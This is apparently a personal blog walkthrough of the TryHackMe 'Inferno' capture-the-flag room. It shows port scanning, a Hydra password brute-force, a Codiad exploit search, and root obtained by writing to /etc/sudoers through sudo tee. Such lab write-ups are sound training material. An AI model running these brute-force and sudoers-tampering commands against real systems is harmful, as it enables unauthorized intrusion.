TryHackMe | Inferno

I recently completed the TryHackMe room Inferno.  This was a medium rated room and I think that was a pretty accurate rating.

I started this capture the flag room the same as any other, with a port scan using the nmap tool.

gareth@enso:~/Desktop/Files/Inferno$ nmap -F 10.10.170.49 -oN inferno.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-13 21:28 CEST
Nmap scan report for 10.10.170.49
Host is up (0.039s latency).
Not shown: 97 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
106/tcp open  pop3pw

I could see there was a web server running on port 80, so I decided to scan for any directories that may be hidden.  My initial scan using the common.txt wordlist returned nothing of interest, so I tried again with the medium directory list.  This turned up a directory that was protected by basic authentication, called inferno.

gareth@enso:~/Desktop/Files/Inferno$ gobuster dir -u http://10.10.170.49 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.170.49
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/13 21:31:58 Starting gobuster in directory enumeration mode
===============================================================
/inferno              (Status: 401) [Size: 459]

I then used Hydra to crack the password to this area, assuming the default username of 'admin' was the one used.  Luckily this assumption paid off and I gained access to the area.

gareth@enso:~/Desktop/Files/Inferno$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 10.10.170.49 http-get /inferno -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-13 21:34:33
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.170.49:80/inferno
[80][http-get] host: 10.10.170.49   login: admin   password: <redacted>
[STATUS] attack finished for 10.10.170.49 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-13 21:35:28

Codiad

This looks like a login for something called Codiad?

I was presented with a login form for what looks like a tool called "Codiad".  I searched for an exploit for Codiad using searchsploit and found the following.

Because these exploits required the user to be authenticated, I tried to reuse the credentials from the basic authentication.  This proved successful and I was able to login.

gareth@enso:~/Desktop/Files/Inferno$ searchsploit Codiad
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities                   | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion                       | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated)      | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)  | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)  | multiple/webapps/49907.py
---------------------------------------------------------- ---------------------------------

After some trial and error with these I could not get any of them to work, so I instead decided to search GitHub and came across a repository that contained an exploit for Codiad which I managed to get working.

I was able to get a reverse-shell on the machine by following the instructions in the exploit file.

Foothold

Now I had a foothold on the server, it was time to enumerate.  I found an interesting file eventually in the /home/dante/Downloads directory called .download.dat which contained what looked like some hexadecimal.  I used Cyberchef to convert this hexadecimal to ASCII and was presented with the following:

«Or se’ tu quel Virgilio e quella fonte
che spandi di parlar sì largo fiume?»,
rispuos’io lui con vergognosa fronte.

«O de li altri poeti onore e lume,
vagliami ’l lungo studio e ’l grande amore
che m’ha fatto cercar lo tuo volume.

Tu se’ lo mio maestro e ’l mio autore,
tu se’ solo colui da cu’ io tolsi
lo bello stilo che m’ha fatto onore.

Vedi la bestia per cu’ io mi volsi;
aiutami da lei, famoso saggio,
ch’ella mi fa tremar le vene e i polsi».

dante:<redacted>

With the credentials at the bottom I was able to access the server via SSH as the dante user and capture the user flag, which was hidden in the local.txt file in the home directory.

gareth@enso:~/Desktop/Files/Inferno$ ssh dante@10.10.170.49
dante@10.10.170.49's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-130-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Aug 13 20:11:10 UTC 2021

  System load:  0.0               Processes:           1198
  Usage of /:   42.0% of 8.79GB   Users logged in:     0
  Memory usage: 61%               IP address for eth0: 10.10.170.49
  Swap usage:   0%


39 packages can be updated.
0 updates are security updates.


Last login: Fri Aug 13 20:10:56 2021 from 10.8.145.210
dante@Inferno:~$ cat local.txt

Privilege Escalation

From running the command sudo -l I can see that the dante user has permissions to run the tee command as sudo.  

dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee

A quick check on GTFOBins showed me how to use this command to gain write-access to any file on the file system.  

LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"

I used this to add the dante user to the /etc/sudoers file, and to allow him to run any command as sudo without a password.  From there I was able to spawn a root shell and capture the root flag.

dante@Inferno:~$ LFILE=/etc/sudoers
dante@Inferno:~$ echo "dante ALL=(root) NOPASSWD: ALL" | sudo tee -a "$LFILE"
dante ALL=(root) NOPASSWD: ALL
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
    (root) NOPASSWD: ALL
dante@Inferno:~$ sudo su
root@Inferno:/home/dante# cd /root
root@Inferno:~# ls
proof.txt
root@Inferno:~# cat proof.txt
Congrats!

You've rooted Inferno!

<redacted>

mindsflee
root@Inferno:~#

Summary

This room took a bit of time to gain a foothold, due to me not being familiar with Codiad and spending a lot of time trying to find an exploit for it that actually worked.  The reverse-shell gained from the exploit found on GitHub was a bit flaky so I had to enumerate quickly.  I was thankful this room contained a step where I obtained the ssh user password so I could gain a more stable connection.

Thankfully the privilege escalation on this one was quite straight forward due to some poor configuration on the server and the great resource that is GTFOBins.

Gareth Oates

Gareth Oates

Oslo, Norway